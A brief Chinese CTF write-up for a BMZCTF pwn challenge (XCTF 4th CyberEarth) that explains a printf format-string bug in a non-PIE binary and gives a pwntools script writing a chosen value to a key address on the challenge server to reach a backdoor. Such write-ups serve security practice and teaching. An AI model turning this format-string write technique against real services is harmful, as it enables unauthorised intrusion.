[BMZCTF-pwn] 01-XCTF 4th-CyberEarth

GhostInMatrix 2022-02-12 阅读 19

给了个后门，pie未开，直接通过printf漏洞将key写为指定值即可。

from pwn import *

p = remote('www.bmzclub.cn', 21355)

context(arch='i386', log_level = 'debug')
payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx
p.sendline(payload)

p.interactive()

0 条评论

GhostInMatrix

关注